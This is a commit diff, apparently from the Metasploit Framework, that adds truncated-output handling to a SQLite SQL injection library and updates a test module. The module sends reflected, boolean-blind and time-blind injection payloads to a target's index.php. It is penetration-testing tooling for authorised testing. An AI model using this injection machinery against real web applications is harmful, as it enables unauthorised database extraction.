add truncated SQLi in SQLite, and update test module to add it as an option
This commit is contained in:
parent
8f9a849591
commit
4374edd37a
|
@ -9,7 +9,7 @@ module Msf::Exploit::SQLi::SQLitei
|
||||||
decode: proc { |data| Rex::Text.hex_to_raw(data) }
|
decode: proc { |data| Rex::Text.hex_to_raw(data) }
|
||||||
}
|
}
|
||||||
}.freeze
|
}.freeze
|
||||||
def initialize(opts, &query_proc)
|
def initialize(opts={}, &query_proc)
|
||||||
opts[:concat_separator] ||= ','
|
opts[:concat_separator] ||= ','
|
||||||
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
|
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
|
||||||
opts[:encoder] = opts[:encoder].downcase.intern
|
opts[:encoder] = opts[:encoder].downcase.intern
|
||||||
|
@ -81,6 +81,20 @@ module Msf::Exploit::SQLi::SQLitei
|
||||||
|
|
||||||
private
|
private
|
||||||
|
|
||||||
|
def truncated_query(query)
|
||||||
|
result = [ ]
|
||||||
|
offset = 1
|
||||||
|
loop do
|
||||||
|
slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
|
||||||
|
offset += @truncation_length # should be same as @truncation_length for most cases
|
||||||
|
result << slice
|
||||||
|
vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
|
||||||
|
print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
|
||||||
|
break if slice.length < @truncation_length
|
||||||
|
end
|
||||||
|
result.join
|
||||||
|
end
|
||||||
|
|
||||||
def call_function(function)
|
def call_function(function)
|
||||||
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
|
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
|
||||||
output = nil
|
output = nil
|
||||||
|
|
|
@ -28,18 +28,19 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
[
|
[
|
||||||
Opt::RHOST('127.0.0.1'),
|
Opt::RHOST('127.0.0.1'),
|
||||||
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
||||||
OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
OptInt.new('SqliType', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
||||||
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
|
OptString.new('Encoder', [false, 'an encoder to use (hex for example)', '']),
|
||||||
OptBool.new('HEX_ENCODE_STRINGS', [false, 'replace strings in the query with hex numbers?', false]),
|
OptBool.new('HexEncodeStrings', [false, 'Replace strings in the query with hex numbers?', false]),
|
||||||
|
OptInt.new('TruncationLength', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0])
|
||||||
]
|
]
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def boolean_blind
|
def boolean_blind
|
||||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = SQLitei::BooleanBasedBlind.new({
|
sqli = SQLitei::BooleanBasedBlind.new({
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
hex_encode_strings: datastore['HexEncodeStrings']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
|
@ -59,10 +60,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def reflected
|
def reflected
|
||||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
|
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
||||||
sqli = SQLitei::Common.new({
|
sqli = SQLitei::Common.new({
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
|
truncation_length: truncation
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
|
@ -78,7 +81,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
if !body
|
if !body
|
||||||
''
|
''
|
||||||
else
|
else
|
||||||
body.strip
|
body = body.strip
|
||||||
|
truncation ? body[0, truncation] : body
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -90,10 +94,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def time_blind
|
def time_blind
|
||||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = SQLitei::TimeBasedBlind.new({
|
sqli = SQLitei::TimeBasedBlind.new({
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
|
@ -139,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
case datastore['SQLI_TYPE']
|
case datastore['SqliType']
|
||||||
when 0 then reflected
|
when 0 then reflected
|
||||||
when 1 then boolean_blind
|
when 1 then boolean_blind
|
||||||
when 2 then time_blind
|
when 2 then time_blind
|
||||||
|
|
Loading…
Reference in New Issue